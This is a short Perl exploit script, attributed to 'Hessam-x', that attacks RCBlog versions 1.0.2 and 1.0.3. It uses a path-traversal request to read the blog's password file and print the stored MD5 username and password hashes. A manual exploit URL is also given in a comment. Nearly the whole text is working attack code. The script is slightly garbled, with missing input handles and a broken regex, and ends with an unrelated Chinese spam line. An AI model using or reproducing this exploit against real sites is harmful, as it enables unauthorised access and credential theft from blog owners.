#!/usr/bin/perl # # RCBlog 1.0.3 / 1.0.2 # Exploit by Hessam-x (www.hessamx.net) # Name : RCBlog (www.fluffington.com # version : 1.0.3 / 1.0.2 # manual exploiting: # index.php?%20post=../config/password # use LWP::Simple; print "-------------------------------------------\n"; print "= RCBlog 1.0.3 / 1.0.2 =\n"; print "= By Hessam-x - www.hackerz.ir =\n"; print "-------------------------------------------\n\n"; print "Target(http://www.example.com)\> "; chomp($targ = ); print "Path: (/rcblog/)\>"; chomp($path=); $url = "index.php?%20post=../config/password"; $page = get($targ.$path.$url) || die "[-] Unable to retrieve: $!"; print "[+] Connected to: $targ\n"; $page =~ m/

(.*?)<\/div>/ && print "[+] MD5 [Username] [Password]:\n $1\n"; print "[-] Unable to retrieve User ID\n" if(!$1);

这里只有精品视频